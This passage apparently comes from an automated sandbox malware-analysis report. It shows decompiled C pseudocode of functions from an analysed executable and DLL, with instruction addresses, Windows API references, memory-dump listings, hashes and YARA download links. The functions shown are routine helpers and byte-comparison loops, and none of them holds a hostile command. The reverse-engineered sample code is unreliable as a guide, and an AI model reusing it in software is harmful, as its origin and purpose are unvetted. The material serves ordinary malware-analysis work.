					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                0x0040205c
                                                0x00402066
                                                0x0040206f
                                                0x00402079
                                                0x00402082
                                                0x0040208c
                                                0x00402090
                                                0x00402090
                                                0x00402095
                                                0x004020a6
                                                0x004020ae
                                                0x0040218e
                                                0x0040218e
                                                0x00402195
                                                0x004020b4
                                                0x004020b4
                                                0x004020c5
                                                0x004020c9
                                                0x004020cf
                                                0x004020d9
                                                0x004020db
                                                0x004020e6
                                                0x004020e9
                                                0x004020f6
                                                0x004020f8
                                                0x004020fa
                                                0x00402101
                                                0x00402104
                                                0x00402104
                                                0x00402107
                                                0x00402111
                                                0x00402119
                                                0x0040211e
                                                0x0040212a
                                                0x0040212a
                                                0x0040212d
                                                0x00402136
                                                0x00402139
                                                0x00402142
                                                0x00402147
                                                0x00402159
                                                0x00402168
                                                0x0040216a
                                                0x00402176
                                                0x00402176
                                                0x00402168
                                                0x00402178
                                                0x0040217e
                                                0x0040217e
                                                0x00402181
                                                0x00402187
                                                0x0040218c
                                                0x004021a1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040218c
                                                0x00402197
                                                0x004028c1
                                                0x004028cd

                                                APIs
                                                • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?), ref: 004020A6
                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ByteCharCreateInstanceMultiWide
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 123533781-2935972921
                                                • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                                • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10009B60, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E10009B60(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                0x10009b65
                                                0x10009b75

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10009B65
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 10009B6E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: b0fbea0425f4393a36563239932169be80c10f585de93763198afdd62a15c69d
                                                • Instruction ID: 94b90477b30676bec5174d0c86af08d776f4734dad835d80667522a9045ad030
                                                • Opcode Fuzzy Hash: b0fbea0425f4393a36563239932169be80c10f585de93763198afdd62a15c69d
                                                • Instruction Fuzzy Hash: 64B09231184218ABFB402BE1DC89B583F28FF04752F808412F60E44860CB7397519B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 39%
                                                			E00402671(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x170);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                0x00402689
                                                0x0040269d
                                                0x004026a8
                                                0x004026a9
                                                0x004027e4
                                                0x0040268b
                                                0x0040268b
                                                0x0040268d
                                                0x0040268f
                                                0x0040268f
                                                0x004028c1
                                                0x004028cd

                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                • Instruction ID: c4b8fb32876d586bcf7df686e34757fa561d471cbaf363f6388d0c393702730c
                                                • Opcode Fuzzy Hash: c707d325fcd64eef76be24f413fce74fcf29a9d2c757c0b7f3e21b108dde0476
                                                • Instruction Fuzzy Hash: 81F0A032A041009ED711EBA49A499EEB7789B11318F60067BE101B21C1C6B859459B2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100098C2, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E100098C2() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x1001dc40 = _t3;
				return 0 | _t3 != 0x00000000;
			}




                                                0x100098c2
                                                0x100098ca
                                                0x100098d6

                                                APIs
                                                • GetProcessHeap.KERNEL32(10012851,100196A0,00000008,10012A29,?,00000001,?,100196C0,0000000C,10012AF9,?,00000001,?), ref: 100098C2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 646ed7e559294f34beebc0a5efae545b15c0726d8fd9449b8ef5808d19fbfaa0
                                                • Instruction ID: 330df4dff84b760c4d3e3547b96fb622717a589370fd0182969ad5b4638ea4ad
                                                • Opcode Fuzzy Hash: 646ed7e559294f34beebc0a5efae545b15c0726d8fd9449b8ef5808d19fbfaa0
                                                • Instruction Fuzzy Hash: 15B012F030212347E70C5B385CA501939D46748201304803EF003C5160DF30C550EB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100066F2, Relevance: .3, Instructions: 345COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E100066F2(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                                0x100066f2
                                                0x100066f2
                                                0x100066f8
                                                0x1000677f
                                                0x10006781
                                                0x10006783
                                                0x00000000
                                                0x00000000
                                                0x10006789
                                                0x1000678f
                                                0x10006816
                                                0x10006818
                                                0x1000681a
                                                0x00000000
                                                0x00000000
                                                0x10006820
                                                0x10006826
                                                0x100068ad
                                                0x100068af
                                                0x100068b1
                                                0x00000000
                                                0x00000000
                                                0x100068b7
                                                0x100068bd
                                                0x10006944
                                                0x10006946
                                                0x10006948
                                                0x00000000
                                                0x00000000
                                                0x1000694e
                                                0x10006954
                                                0x100069db
                                                0x100069dd
                                                0x100069df
                                                0x00000000
                                                0x00000000
                                                0x100069eb
                                                0x10006a73
                                                0x10006a75
                                                0x10006a77
                                                0x00000000
                                                0x00000000
                                                0x10006a7d
                                                0x10006a83
                                                0x10006b0a
                                                0x10006b0c
                                                0x10006b0e
                                                0x10006b0e
                                                0x00000000
                                                0x10006b0e
                                                0x10006a90
                                                0x10006a92
                                                0x10006aaa
                                                0x10006ab2
                                                0x10006ab4
                                                0x10006acc
                                                0x10006ad4
                                                0x10006ad6
                                                0x10006aee
                                                0x10006af6
                                                0x10006af8
                                                0x10006b01
                                                0x10006b01
                                                0x00000000
                                                0x10006af8
                                                0x10006adf
                                                0x10006ae8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006ae8
                                                0x10006abd
                                                0x10006ac6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006ac6
                                                0x10006a9b
                                                0x10006aa4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006aa4
                                                0x100069f9
                                                0x100069fb
                                                0x10006a13
                                                0x10006a1b
                                                0x10006a1d
                                                0x10006a35
                                                0x10006a3d
                                                0x10006a3f
                                                0x10006a57
                                                0x10006a5f
                                                0x10006a61
                                                0x10006a6a
                                                0x10006a6a
                                                0x00000000
                                                0x10006a61
                                                0x10006a48
                                                0x10006a51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006a51
                                                0x10006a26
                                                0x10006a2f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006a2f
                                                0x10006a04
                                                0x10006a0d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006a0d
                                                0x10006961
                                                0x10006963
                                                0x1000697b
                                                0x10006983
                                                0x10006985
                                                0x1000699d
                                                0x100069a5
                                                0x100069a7
                                                0x100069bf
                                                0x100069c7
                                                0x100069c9
                                                0x100069d2
                                                0x100069d2
                                                0x00000000
                                                0x100069c9
                                                0x100069b0
                                                0x100069b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100069b9
                                                0x1000698e
                                                0x10006997
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006997
                                                0x1000696c
                                                0x10006975
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006975
                                                0x100068ca
                                                0x100068cc
                                                0x100068e4
                                                0x100068ec
                                                0x100068ee
                                                0x10006906
                                                0x1000690e
                                                0x10006910
                                                0x10006928
                                                0x10006930
                                                0x10006932
                                                0x1000693b
                                                0x1000693b
                                                0x00000000
                                                0x10006932
                                                0x10006919
                                                0x10006922
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006922
                                                0x100068f7
                                                0x10006900
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006900
                                                0x100068d5
                                                0x100068de
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100068de
                                                0x10006833
                                                0x10006835
                                                0x1000684d
                                                0x10006855
                                                0x10006857
                                                0x1000686f
                                                0x10006877
                                                0x10006879
                                                0x10006891
                                                0x10006899
                                                0x1000689b
                                                0x100068a4
                                                0x100068a4
                                                0x00000000
                                                0x1000689b
                                                0x10006882
                                                0x1000688b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000688b
                                                0x10006860
                                                0x10006869
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006869
                                                0x1000683e
                                                0x10006847
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006847
                                                0x1000679c
                                                0x1000679e
                                                0x100067b6
                                                0x100067be
                                                0x100067c0
                                                0x100067d8
                                                0x100067e0
                                                0x100067e2
                                                0x100067fa
                                                0x10006802
                                                0x10006804
                                                0x1000680d
                                                0x1000680d
                                                0x00000000
                                                0x10006804
                                                0x100067eb
                                                0x100067f4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100067f4
                                                0x100067c9
                                                0x100067d2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100067d2
                                                0x100067a7
                                                0x100067b0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x100066fe
                                                0x100066fe
                                                0x10006705
                                                0x10006707
                                                0x1000671f
                                                0x1000671f
                                                0x10006727
                                                0x10006729
                                                0x10006741
                                                0x10006741
                                                0x10006749
                                                0x1000674b
                                                0x10006763
                                                0x10006763
                                                0x1000676b
                                                0x1000676d
                                                0x10006776
                                                0x10006776
                                                0x00000000
                                                0x1000676d
                                                0x10006751
                                                0x10006754
                                                0x1000675d
                                                0x100062b5
                                                0x100062b5
                                                0x100070a6
                                                0x100070a6
                                                0x00000000
                                                0x1000675d
                                                0x1000672f
                                                0x10006732
                                                0x1000673b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000673b
                                                0x1000670d
                                                0x10006710
                                                0x10006719
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006719

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction ID: 59b9ccafa3af49cd88bbdd7374fc6b5821e1434ac54296cd17ea50948520c0ff
                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                • Instruction Fuzzy Hash: 9FC1633220959309EB4DCA79887413EBBE2DB966F1327576DD4B2DF1D8EF20C524DA20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001AA24, Relevance: .3, Instructions: 341COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ae06f62e623463a2f3f0767ba0ac92bbd3f43da31655b5ffc641c2b340686a76
                                                • Instruction ID: 00a76544c8ef7dd371508f1f3a73c04aef6c909bfb402617bb54817c82ee37a4
                                                • Opcode Fuzzy Hash: ae06f62e623463a2f3f0767ba0ac92bbd3f43da31655b5ffc641c2b340686a76
                                                • Instruction Fuzzy Hash: DBF1131485D2EDADCB06CBF945547FCBFB05D2A102F0841CAE4E4A6243C53A938EDB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10006B27, Relevance: .3, Instructions: 341COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E10006B27(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
